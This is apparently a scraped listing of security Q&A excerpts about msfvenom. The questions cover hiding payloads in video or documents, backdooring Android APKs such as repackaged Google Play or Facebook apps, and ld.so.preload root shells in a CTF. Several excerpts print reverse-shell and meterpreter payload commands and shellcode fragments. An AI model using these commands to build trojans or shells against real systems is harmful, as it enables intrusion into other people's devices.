Msfvenom for video files
I know that you can use Msfvenom to insert a virus in a document (image, pdf, etc). But is there a tool but for video, for example? I search on the official website, but didn’t find anything.
If so, is the risks the sames?
Collaborate Disseminate
I know that you can use Msfvenom to insert a virus in a document (image, pdf, etc). But is there a tool but for video, for example? I search on the official website, but didn’t find anything.
If so, is the risks the sames?
I am trying to find any way to create a payload .apk using msfvenom and not using its provided list. I want to use my own .apk as the base.
I have found similar functionality for Windows payloads, but am confused for Android .apk. What com… Continue reading Is it possible to build an msvenom Android .apk using a custom source .apk?
I am using msfvenom to backdoor an Android apk. It is supposed that msfvenom adds extra permissions to original AndroidManifest:
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission androi… Continue reading msfvenom: backdoored apk
Running the below command on msfvenom, my payload returned is giving the letter b on every line
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.186 LPORT=445 EXITFUNC=thread -b \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40 -v shellco… Continue reading Why does msfvenom generate the letter b on every line? [closed]
So after running the command:
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.31 lport=8080 -f py
I receive the output:
buf = b””
buf += b”\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b”
buf += b”\x50\x30\x… Continue reading Executing shellcode in python format [on hold]
I’m playing some CTF challenges and I’m trying to exploit ld.so.preload to obtain a root shell.
I’m currently testing on my local Kali.
I generate my payload as follows:
msfvenom -p linux/x64/exec CMD=”/bin/bash” -o elf-so… Continue reading How to use msfvenom elf-so format together with /etc/ld.so.preload?
When injecting payloads into existing apk files, I’ve noticed that sometimes the permissions written to the AndroidManifest.xml file are not always read.
I would have downloaded an apk file off Google Play and then run the f… Continue reading MSFVenom No Permissions on infected apk
I am learning ethical hacking recently. I installed Metasploit on my Ubuntu system. While I’m building the payload, I’m getting the following error message:
error : Invalid template:facebook.apk
I’m using another signed apk file (like F… Continue reading Error: Inavlid template facebook.apk while using metasploit for hacking android
I can find lots of examples of how to use MSFVenom online however I was curious as to how MSFVenom generates payloads and I have not been able to find much information on this.
Does anyone have any links that explain how a p… Continue reading MSFVenom payload generation
I still do not understand the msfvenom format ( -f ) parameter regarding the resulting op codes. I do not understand why a payload consists of different op codes when the format ( -f ) is different, whereas all other paramete… Continue reading msfvenom produces different op codes when format is given with ‘c’ instead of ‘python’